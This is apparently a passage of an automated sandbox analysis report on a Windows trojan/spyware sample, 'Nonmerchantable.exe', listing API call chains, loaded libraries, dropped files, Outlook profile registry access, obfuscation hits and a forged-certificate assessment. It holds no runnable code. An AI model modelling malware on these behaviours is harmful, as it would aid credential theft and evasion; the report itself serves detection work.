            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_394FA0905_2_394FA090
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_394FD2905_2_394FD290
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_394FBCB05_2_394FBCB0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_394F8AB05_2_394F8AB0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_394FEEB05_2_394FEEB0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_395139985_2_39513998
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_39511DF85_2_39511DF8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_395132B05_2_395132B0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_395116D85_2_395116D8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_39512BC85_2_39512BC8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_39514A8F5_2_39514A8F
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_39510FF05_2_39510FF0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_395124E05_2_395124E0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_395139875_2_39513987
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_39511DE85_2_39511DE8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_3951329F5_2_3951329F
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_395116C85_2_395116C8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_39512BB95_2_39512BB9
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_39510C785_2_39510C78
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_39510C6A5_2_39510C6A
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_39510FE25_2_39510FE2
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_395101DA5_2_395101DA
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_395101E85_2_395101E8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_395124D05_2_395124D0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_39BABA555_2_39BABA55
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_39BA5C145_2_39BA5C14
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_39BA6BB15_2_39BA6BB1
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_39BA324C5_2_39BA324C
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_39BA5C095_2_39BA5C09
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_39BA1F405_2_39BA1F40
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: String function: 00402BCE appears 48 times
            Source: Nonmerchantable.exeStatic PE information: invalid certificate
            Source: Nonmerchantable.exe, 00000005.00000002.4201291282.0000000035F27000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Nonmerchantable.exe
            Source: Nonmerchantable.exe, 00000005.00000002.4179767615.00000000058D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Nonmerchantable.exe
            Source: Nonmerchantable.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/14@5/5
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_00403348
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,5_2_00403348
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 0_2_0040460D GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040460D
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
            Source: C:\Users\user\Desktop\Nonmerchantable.exeFile created: C:\Program Files (x86)\HypotesersJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\doggingJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeMutant created: NULL
            Source: C:\Users\user\Desktop\Nonmerchantable.exeFile created: C:\Users\user\AppData\Local\Temp\nscAB8E.tmpJump to behavior
            Source: Nonmerchantable.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Nonmerchantable.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Nonmerchantable.exeReversingLabs: Detection: 62%
            Source: Nonmerchantable.exeVirustotal: Detection: 65%
            Source: C:\Users\user\Desktop\Nonmerchantable.exeFile read: C:\Users\user\Desktop\Nonmerchantable.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Nonmerchantable.exe "C:\Users\user\Desktop\Nonmerchantable.exe"
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess created: C:\Users\user\Desktop\Nonmerchantable.exe "C:\Users\user\Desktop\Nonmerchantable.exe"
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess created: C:\Users\user\Desktop\Nonmerchantable.exe "C:\Users\user\Desktop\Nonmerchantable.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeFile written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\dogging\Tvejrs.iniJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Nonmerchantable.exeStatic file information: File size 1189128 > 1048576
            Source: Nonmerchantable.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.3640382417.00000000051B1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 0_2_6F951A98 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,lstrcpyA,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleA,LdrInitializeThunk,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6F951A98
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 0_2_6F952F60 push eax; ret 0_2_6F952F8E
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_0585B539 push dword ptr [ebp+ebx-75h]; iretd 5_2_0585B53D
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_0585B4C7 push dword ptr [ebp+ecx-75h]; retf 5_2_0585B4D2
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_3925AE1D push dword ptr [ebp+eax-18h]; retf 5_2_3925AE21

            Persistence and Installation Behavior

            barindex
            Source: Initial sampleJoe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) Self-signed certificate (issuer and subject are identical) 2) Certificate validation failed with untrusted root certificate 3) Organization name 'Antikvitetsinteresserede' appears nonsensical and not a legitimate business 4) Email domain 'Holdership.Bor' is highly suspicious and not a valid TLD 5) Compilation date (July 2021) is significantly older than the certificate dates (June 2024-2025), suggesting certificate was likely generated to mask malicious code 6) While the country code is France (FR), which is not inherently suspicious, the organization name appears to be Danish/Norwegian which creates a geographical inconsistency 7) The OU field contains strange characters and spacing patterns typical of attempting to evade detection. These characteristics are commonly associated with malware attempting to appear legitimate through fake certificates.
            Source: C:\Users\user\Desktop\Nonmerchantable.exeFile created: C:\Users\user\AppData\Local\Temp\nsmABCD.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
